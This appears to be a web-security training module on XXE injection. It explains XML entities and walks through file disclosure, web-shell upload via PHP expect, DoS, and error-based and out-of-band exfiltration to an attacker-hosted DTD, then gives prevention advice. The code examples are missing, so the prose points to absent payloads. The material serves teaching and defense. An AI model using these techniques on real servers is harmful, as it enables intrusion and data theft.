XML External Entity (XXE) Injection
Intro to XXE
XML
Extensible Markup Language (XML)
is a common markup language (similar to HTML and SGML) designed for flexible transfer and storage of data and documents in various types of applications. XML is not focused on displaying data but mostly on storing documents' data and representing data structures. XML documents are formed of element trees, where each element is essentially denoted by a tag
, and the first element is called the root element
, while other elements are child elements
.
Here we see a basic example of an XML document representing an e-mail document structure:
The above example shows some of the key elements of an XML document, like:
Tag
The keys of an XML document, usually wrapped with (<
/>
) characters.
<date>
Entity
XML variables, usually wrapped with (&
/;
) characters.
<
Element
The root element or any of its child elements, and its value is stored in between a start-tag and an end-tag.
<date>01-01-2022</date>
Attribute
Optional specifications for any element that are stored in the tags, which may be used by the XML parser.
version="1.0"
/encoding="UTF-8"
Declaration
Usually the first line of an XML document, and defines the XML version and encoding to use when parsing it.
<?xml version="1.0" encoding="UTF-8"?>
Furthermore, some characters are used as part of an XML document structure, like <
, >
, &
, or "
. So, if we need to use them in an XML document, we should replace them with their corresponding entity references (e.g. <
, >
, &
, "
). Finally, we can write comments in XML documents between <!--
and -->
, similar to HTML documents.
XML DTD
XML Document Type Definition (DTD)
allows the validation of an XML document against a pre-defined document structure. The pre-defined document structure can be defined in the document itself or in an external file. The following is an example DTD for the XML document we saw earlier:
As we can see, the DTD is declaring the root email
element with the ELEMENT
type declaration and then denoting its child elements. After that, each of the child elements is also declared, where some of them also have child elements, while others may only contain raw data (as denoted by PCDATA
).
The above DTD can be placed within the XML document itself, right after the XML Declaration
in the first line. Otherwise, it can be stored in an external file (e.g. email.dtd
), and then referenced within the XML document with the SYSTEM
keyword, as follows:
It is also possible to reference a DTD through a URL, as follows:
This is relatively similar to how HTML documents define and reference JavaScript and CSS scripts.
XML Entities
We may also define custom entities (i.e. XML variables) in XML DTDs, to allow refactoring of variables and reduce repetitive data. This can be done with the use of the ENTITY
keyword, which is followed by the entity name and its value, as follows:
Once we define an entity, it can be referenced in an XML document between an ampersand &
and a semi-colon ;
(e.g. &company;
). Whenever an entity is referenced, it will be replaced with its value by the XML parser. Most interestingly, however, we can reference External XML Entities
with the SYSTEM
keyword, which is followed by the external entity's path, as follows:
Note: We may also use the PUBLIC
keyword instead of SYSTEM
for loading external resources, which is used with publicly declared entities and standards, such as a language code (lang="en"
). In this module, we'll be using SYSTEM
, but we should be able to use either in most cases.
This works similarly to internal XML entities defined within documents. When we reference an external entity (e.g. &signature;
), the parser will replace the entity with its value stored in the external file (e.g. signature.txt
). When the XML file is parsed on the server-side, in cases like SOAP (XML) APIs or web forms, then an entity can reference a file stored on the back-end server, which may eventually be disclosed to us when we reference the entity
.
Local File Disclosure
In the example we have an HTTP Form that sends the date in an XML format and reflects the email node content into the response by saying to check the email for further instructions.
So, let us try to define a new entity and then use it as a variable in the email
element to see whether it gets replaced with the value we defined. To do so, we can use what we learned in the previous section for defining new XML entities and add the following lines after the first line in the XML input:
Now, we should have a new XML entity called company
, which we can reference with &company;
. So, instead of using our email in the email
element, let us try using &company;
, and see whether it will be replaced with the value we defined (Inlane Freight
):
Some web applications may default to a JSON format in HTTP request, but may still accept other formats, including XML. So, even if a web app sends requests in a JSON format, we can try changing the Content-Type
header to application/xml
, and then convert the JSON data to XML with an online tool. If the web application does accept the request with XML data, then we may also test it against XXE vulnerabilities, which may reveal an unanticipated XXE vulnerability.
Reading Sensitive Files
Now that we can define new internal XML entities let's see if we can define external XML entities. Doing so is fairly similar to what we did earlier, but we'll just add the SYSTEM
keyword and define the external reference path after it, as we have learned in the previous section:
We can refer to the File Inclusion to see what attacks can be carried out through local file disclosure.
In certain Java web applications, we may also be able to specify a directory instead of a file, and we will get a directory listing instead, which can be useful for locating sensitive files.
Reading Source Code
Another benefit of local file disclosure is the ability to obtain the source code of the web application. This would allow us to perform a Whitebox Penetration Test
to unveil more vulnerabilities in the web application, or at the very least reveal secret configurations like database passwords or API keys.
If a file contains some of XML's special characters (e.g. <
/>
/&
), it would break the external entity reference and not be used for the reference. Furthermore, we cannot read any binary data, as it would also not conform to the XML format.
Luckily, PHP provides wrapper filters that allow us to base64 encode certain resources 'including files', in which case the final base64 output should not break the XML format. To do so, instead of using file://
as our reference, we will use PHP's php://filter/
wrapper. With this filter, we can specify the convert.base64-encode
encoder as our filter, and then add an input resource (e.g. resource=index.php
), as follows:
This trick only works with PHP web applications.
The next section will discuss a more advanced method for reading source code, which should work with any web framework.
Remote Code Execution with XXE
In addition to reading local files, we may be able to gain code execution over the remote server. The easiest method would be to look for ssh
keys, or attempt to utilize a hash stealing trick in Windows-based web applications, by making a call to our server.
If these do not work, we may still be able to execute commands on PHP-based web applications through the PHP://expect
filter, though this requires the PHP expect
module to be installed and enabled.
If the XXE directly prints its output 'as shown in this section', then we can execute basic commands as expect://id
, and the page should print the command output. However, if we did not have access to the output, or needed to execute a more complicated command 'e.g. reverse shell', then the XML syntax may break and the command may not execute.
The most efficient method to turn XXE into RCE is by fetching a web shell from our server and writing it to the web app, and then we can interact with it to execute commands. To do so, we can start by writing a basic PHP web shell and starting a python web server, as follows:
Now, we can use the following XML code to execute a curl
command that downloads our web shell into the remote server:
We replaced all spaces in the above XML code with $IFS
, to avoid breaking the XML syntax. Furthermore, many other characters like |
, >
, and {
may break the code, so we should avoid using them.
Once we send the request, we should receive a request on our machine for the shell.php
file, after which we can interact with the web shell on the remote server for code execution.
The expect module is not enabled/installed by default on modern PHP servers, so this attack may not always work. This is why XXE is usually used to disclose sensitive local files and source code, which may reveal additional vulnerabilities or ways to gain code execution.
Other XXE Attacks
Another common attack often carried out through XXE vulnerabilities is SSRF exploitation, which is used to enumerate locally open ports and access their pages, among other restricted web pages, through the XXE vulnerability
Finally, one common use of XXE attacks is causing a Denial of Service (DOS) to the hosting web server, with the use the following payload:
This payload defines the a0
entity as DOS
, references it in a1
multiple times, references a1
in a2
, and so on until the back-end server's memory runs out due to the self-reference loops. However, this attack no longer works with modern web servers (e.g., Apache), as they protect against entity self-reference
.
Advanced File Disclosure
Not all XXE vulnerabilities may be straightforward to exploit. Some file formats may not be readable through basic XXE, while in other cases, the web application may not output any input values in some instances, so we may try to force it through errors.
Advanced Exfiltration with CDATA
In the previous section, we saw how we could use PHP filters to encode PHP source files, such that they would not break the XML format when referenced, which (as we saw) prevented us from reading these files. But what about other types of Web Applications? We can utilize another method to extract any kind of data (including binary data) for any web application backend. To output data that does not conform to the XML format, we can wrap the content of the external file reference with a CDATA
tag (e.g. <![CDATA[ FILE_CONTENT ]]>
). This way, the XML parser would consider this part raw data, which may contain any type of data, including any special characters.
One easy way to tackle this issue would be to define a begin
internal entity with <![CDATA[
, an end
internal entity with ]]>
, and then place our external entity file in between, and it should be considered as a CDATA
element, as follows:
After that, if we reference the &joined;
entity, it should contain our escaped data. However, this will not work, since XML prevents joining internal and external entities, so we will have to find a better way to do so.
To bypass this limitation, we can utilize XML Parameter Entities
, a special type of entity that starts with a %
character and can only be used within the DTD.
What's unique about parameter entities is that if we reference them from an external source (e.g., our own server), then all of them would be considered as external and can be joined, as follows:
So, let's try to read the submitDetails.php
file by first storing the above line in a DTD file (e.g. xxe.dtd
), host it on our machine, and then reference it as an external entity on the target web application, as follows:
Now, we can reference our external entity (xxe.dtd
) and then print the &joined;
entity we defined above, which should contain the content of the submitDetails.php
file, as follows:
Once we write our xxe.dtd
file, host it on our machine, and then add the above lines to our HTTP request to the vulnerable web application, we can finally get the content of the submitDetails.php
file:
As we can see, we were able to obtain the file's source code without needing to encode it to base64, which saves a lot of time when going through various files to look for secrets and passwords.
In some modern web servers, we may not be able to read some files (like index.php), as the web server would be preventing a DOS attack caused by file/entity self-reference (i.e., XML entity reference loop), as mentioned in the previous section.
This trick can become very handy when the basic XXE method does not work or when dealing with other web development frameworks
Error Based XXE
Another situation we may find ourselves in is one where the web application might not write any output, so we cannot control any of the XML input entities to write its content. In such cases, we would be blind
to the XML output and so would not be able to retrieve the file content using our usual methods.
If the web application displays runtime errors (e.g., PHP errors) and does not have proper exception handling for the XML input, then we can use this flaw to read the output of the XXE exploit. If the web application neither writes XML output nor displays any errors, we would face a completely blind situation, which we will discuss in the next section.
First, let's try to send malformed XML data, and see if the web application displays any errors. To do so, we can delete any of the closing tags, change one of them, so it does not close (e.g. <roo>
instead of <root>
), or just reference a non-existing entity, as follows:
We see that we did indeed cause the web application to display an error, and it also revealed the web server directory, which we can use to read the source code of other files. Now, we can exploit this flaw to exfiltrate file content. To do so, we will use a similar technique to what we used earlier. First, we will host a DTD file that contains the following payload:
The above payload defines the file
parameter entity and then joins it with an entity that does not exist. In our previous exercise, we were joining three strings. In this case, %nonExistingEntity;
does not exist, so the web application would throw an error saying that this entity does not exist, along with our joined %file;
as part of the error. There are many other variables that can cause an error, like a bad URI or having bad characters in the referenced file.
Now, we can call our external DTD script, and then reference the error
entity, as follows:
Once we host our DTD script as we did earlier and send the above payload as our XML data (no need to include any other XML data), we will get the content of the /etc/hosts
file as follows:
This method may also be used to read the source code of files. All we have to do is change the file name in our DTD script to point to the file we want to read (e.g. "file:///var/www/html/submitDetails.php"
). However, this method is not as reliable as the previous method for reading source files
, as it may have length limitations, and certain special characters may still break it.
Blind Data Exfiltration
Out-of-band Data Exfiltration
For such cases, we can utilize a method known as Out-of-band (OOB) Data Exfiltration
, which is often used in similar blind cases with many web attacks, like blind SQL injections, blind command injections, blind XSS, and of course, blind XXE.
In our previous attacks, we utilized an out-of-band
attack since we hosted the DTD file in our machine and made the web application connect to us (hence out-of-band). So, our attack this time will be pretty similar, with one significant difference. Instead of having the web application output our file
entity to a specific XML entity, we will make the web application send a web request to our web server with the content of the file we are reading.
To do so, we can first use a parameter entity for the content of the file we are reading while utilizing PHP filter to base64 encode it. Then, we will create another external parameter entity and reference it to our IP, and place the file
parameter value as part of the URL being requested over HTTP, as follows:
We can even write a simple PHP script that automatically detects the encoded file content, decodes it, and outputs it to the terminal:
So, we will first write the above PHP code to index.php
, and then start a PHP server on port 8000
, as follows:
Now, to initiate our attack, we can use a similar payload to the one we used in the error-based attack, and simply add <root>&content;</root>
, which is needed to reference our entity and have it send the request to our machine with the file content:
Then, we can send our request to the web application:
Finally, we can go back to our terminal, and we will see that we did indeed get the request and its decoded content
In addition to storing our base64 encoded data as a parameter to our URL, we may utilize DNS OOB Exfiltration
by placing the encoded data as a sub-domain for our URL (e.g. ENCODEDTEXT.our.website.com
), and then use a tool like tcpdump
to capture any incoming traffic and decode the sub-domain string to get the data. Granted, this method is more advanced and requires more effort to exfiltrate data through.
Automated OOB Exfiltration
Although in some instances we may have to use the manual method we learned above, in many other cases, we can automate the process of blind XXE data exfiltration with tools. One such tool is XXEinjector. This tool supports most of the tricks we learned in this module, including basic XXE, CDATA source exfiltration, error-based XXE, and blind OOB XXE.
To use this tool for automated OOB exfiltration, we can first clone the tool to our machine, as follows:
Once we have the tool, we can copy the HTTP request from Burp and write it to a file for the tool to use. We should not include the full XML data, only the first line, and write XXEINJECT
after it as a position locator for the tool:
Now, we can run the tool with the --host
/--httpport
flags being our IP and port, the --file
flag being the file we wrote above, and the --path
flag being the file we want to read. We will also select the --oob=http
and --phpfilter
flags to repeat the OOB attack we did above, as follows:
We see that the tool did not directly print the data. This is because we are base64 encoding the data, so it does not get printed. In any case, all exfiltrated files get stored in the Logs
folder under the tool, and we can find our file there:
XXE Prevention
We have seen that XXE vulnerabilities mainly occur when an unsafe XML input references an external entity, which is eventually exploited to read sensitive files and perform other actions. Preventing XXE vulnerabilities is relatively easier than preventing other web vulnerabilities, as they are caused mainly by outdated XML libraries.
Avoiding Outdated Components
While other input validation web vulnerabilities are usually prevented through secure coding practices (e.g., XSS, IDOR, SQLi, OS Injection), this is not entirely necessary to prevent XXE vulnerabilities. This is because XML input is usually not handled manually by the web developers but by the built-in XML libraries instead. So, if a web application is vulnerable to XXE, this is very likely due to an outdated XML library that parses the XML data.
For example, PHP's libxml_disable_entity_loader function is deprecated since it allows a developer to enable external entities in an unsafe manner, which leads to XXE vulnerabilities. If we visit PHP's documentation for this function, we see the following warning:
Warning
This function has been DEPRECATED as of PHP 8.0.0. Relying on this function is highly discouraged.
Note: You can find a detailed report of all vulnerable XML libraries, with recommendations on updating them and using safe functions, in OWASP's XXE Prevention Cheat Sheet.
In addition to updating the XML libraries, we should also update any components that parse XML input, such as API libraries like SOAP. Furthermore, any document or file processors that may perform XML parsing, like SVG image processors or PDF document processors, may also be vulnerable to XXE vulnerabilities, and we should update them as well.
These issues are not exclusive to XML libraries only, as the same applies to all other web components (e.g., outdated Node Modules
). In addition to common package managers (e.g. npm
), common code editors will notify web developers of the use of outdated components and suggest other alternatives. In the end, using the latest XML libraries and web development components can greatly help reduce various web vulnerabilities
, including XXE.
Using Safe XML Configurations
Other than using the latest XML libraries, certain XML configurations for web applications can help reduce the possibility of XXE exploitation. These include:
Disable referencing custom
Document Type Definitions (DTDs)
Disable referencing
External XML Entities
Disable
Parameter Entity
processingDisable support for
XInclude
Prevent
Entity Reference Loops
Another thing we saw was Error-based XXE exploitation. So, we should always have proper exception handling in our web applications and should always disable displaying runtime errors in web servers
.
Such configurations should be another layer of protection if we miss updating some XML libraries and should also prevent XXE exploitation. However, we may still be using vulnerable libraries in such cases and only applying workarounds against exploitation, which is not ideal.
With the various issues and vulnerabilities introduced by XML data, many also recommend using other formats, such as JSON or YAML
. This also includes avoiding API standards that rely on XML (e.g., SOAP) and using JSON-based APIs instead (e.g., REST).
Finally, using Web Application Firewalls (WAFs) is another layer of protection against XXE exploitation. However, we should never entirely rely on WAFs and leave the back-end vulnerable, as WAFs can always be bypassed.
Last updated